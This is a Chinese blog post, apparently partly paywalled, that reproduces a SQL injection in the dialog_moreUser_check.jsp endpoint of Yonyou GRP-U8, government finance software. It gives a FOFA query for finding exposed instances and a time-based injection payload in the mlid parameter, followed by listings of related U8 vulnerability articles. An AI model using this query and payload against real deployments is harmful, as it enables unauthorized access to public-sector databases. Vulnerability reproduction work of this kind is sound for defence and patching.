用友U8_dialog_moreUser_check.jsp_SQL注入漏洞复现

已于 2024-05-17 21:56:07 修改
阅读量55 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2024-05-15 16:20:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/138912724
版权
漏洞复现 专栏收录该内容
36 篇文章 14 订阅 ¥9.90 ¥99.00
订阅专栏
本文介绍了用友U8的dialog_moreUser_check.jsp存在的SQL注入漏洞,通过POC演示了漏洞复现过程,展示了延时响应的现象。同时提供了利用SQLMAP进行测试的方法,并给出了修复建议,即联系厂商获取更新补丁。文章强调仅供经验分享,对利用信息产生的后果不负责任。
摘要由CSDN通过智能技术生成

简介

用友GRP-U8是用友软件针对政府及公共部门推出的管理软件产品。

GRP是Government Resource Planning的缩写,即政府资源计划。这个产品设计用于满足政府部门在财务管理、人力资源管理、资产管理、供应链管理等方面的需求。

漏洞复现

FOFA:

app="用友-GRP-U8"

访问界面如下所示:

POC:

/u8qx/dialog_moreUser_check.jsp?mlid=1

/u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:5'--

拼接url访问返回信息如下所示:

ip:port/u8qx

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友GRP-U8 listSelectDialogServlet SQL注入漏洞复现
0xSec
02-05 511
用友GRP-U8R10行政事业内控管理软件listSelectDialogServlet 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3540
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
漏洞复现用友GRP-U8——dialog_moreUser_check.jsp——SQL注入
LongL_GuYu的博客
06-27 632
用友GRP-U8是一款企业管理软件,其系统`dialog_moreUser_check.jsp`接口存在SQL注入漏洞
漏洞复现用友 GRP-U8 Proxy SQL注入
最新发布
凝聚力安全团队
07-07 314
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。用友 GRP-U8 Proxy 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限
复现用友GRP-U8 XXE漏洞_14
fushuang333的博客
01-10 588
复现用友GRP-U8 XXE漏洞,通过上传xml文件,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等
漏洞复现用友GRP-U8 SelectDMJE.jsp SQL注入漏洞
m0_64366018的博客
01-25 643
【代码】【漏洞复现用友GRP-U8 SelectDMJE.jsp SQL注入漏洞
用友GRP-U8 任意文件上传漏洞
weixin_44304678的博客
11-02 719
用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友GRP-U8 SQL注入漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1723
用友GRP-U8 SQL注入漏洞复现
用友GRP-U8 dialog_moreUser_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10610)
0xSec
05-14 414
用友GRP-U8R10行政事业内控管理软件dialog_moreUser_check.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
大商创多用户商城系统 多处SQL注入漏洞复现
0xSec
04-04 939
大商创多用户商城系统ajax_dialog.php、wholesale_flow.php等接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意SQL代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。
python dialog使用_dialog的使用方法
weixin_42526417的博客
02-19 4327
dialog的使用方法发布时间:2020-06-03 14:09:01来源:亿速云阅读:563作者:Leah今天小编给大家分享的是dialog的使用方法的介绍,相信大部分人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,话不多说,一起往下看吧。一、基础知识1. dialog简介窗口是GUI设计中不可获取的一部分,方便用户和程序直接交互,简化使用;Qdialog主要包含QInputDial...
当Element UI里面el_dialog嵌套echart组件,打开el_dialog时报echarts.init Error: Initialize failed: invalid dom
迎接_成
01-22 2844
是因为打开el_dialog时,dom元素还没有渲染完成,所以用document.getElementId(“元素Id”)或者refs获取不到元素,导致echart.init报Error:Initializefailed:invaliddom.解决方法:1.可以使用‘vm.refs获取不到元素,导致echart.init报Error: Initialize failed: invalid dom....
用友U8SMSProxy -SQL注入漏洞
zkaqlaoniao的博客
10-26 399
用友GRP-U8 R10政务管理软件是由用友政务公司基于云技术所推出的第十代政务产品。这款产品继承了用友R9、R9i、U8等行政事业版产品的各项优点,并融合了全国广大用户的最佳实践应用。它旨在为政府财政部门、社保部门、卫生部门、教育部门、民政部门、党务部门以及农村等政府及行政事业单位提供专业管理解决方案。该漏洞存在于U8SMSProxy,后端对begindate传参的数据值没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。直接copy进文件,打”*”号,sqlmap一把嗦。
漏洞复现】某友GRP-U8 SQL注入
失心少年
09-26 487
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。某友GRP-U8是某友软件推出的企业级管理软件套件,旨在助力企业实现全面数字化管理及业务优化,某友GRP-U8的bx_historyDataCheck.jsp接口对用户传入的参数未进行有效的过滤,直接拼接至SQL查询的语句中,导致SQL注入漏洞,攻击者可利用该漏洞获取数据库的敏感信息。
用友GRP-U8存在SQL注入漏洞复现
2301_80115097的博客
10-26 434
fofa:app=”用友-GRP-U8用友GRP-U8存在SQL注入漏洞文件名为bx_historyDataCheck.jsp
用友 GRP-U8 存在sql注入漏洞复现
zkaqlaoniao的博客
10-30 1261
Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者info:name: 用友GRP-U8 License Check漏洞requests:path:kjnd=1';matchers:dsl:还没看够?可以关注~免费领取安全学习资料包!(私聊进群一起学习,共同进步)渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
dialog-el8.x86_64.rpm
11-21
dialog-el8.x86_64.rpm是一个基于文本界面的对话框库,它适用于x86_64架构的Red Hat Enterprise Linux 8操作系统。这个软件包提供了一套用于创建交互式对话框的脚本命令和工具。通过使用这个软件包,用户可以在命令行界面中创建各种不同类型的对话框,如消息框、输入框、菜单等,以便与用户进行交互。 通过这个包,用户可以在脚本中使用对话框来收集用户输入,展示信息或展示菜单选项。这种对话框功能可以在脚本命令中方便地集成,并提供一种与用户进行交互的方法。对话框的外观和行为可以通过指定不同的选项和参数进行自定义,以满足特定的需求。 dialog-el8.x86_64.rpm的安装非常简单,只需通过rpm命令来进行安装即可。在安装完成后,用户可以通过在命令行中运行dialog命令来启动对话框界面。此外,还提供了其他一些可用于控制对话框行为和外观的命令选项。 总之,dialog-el8.x86_64.rpm是一个供Red Hat Enterprise Linux 8用户使用的基于文本界面的对话框库。它为用户提供了一种简单、方便的方法来创建交互式对话框,以便在命令行界面进行用户与脚本的交互。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值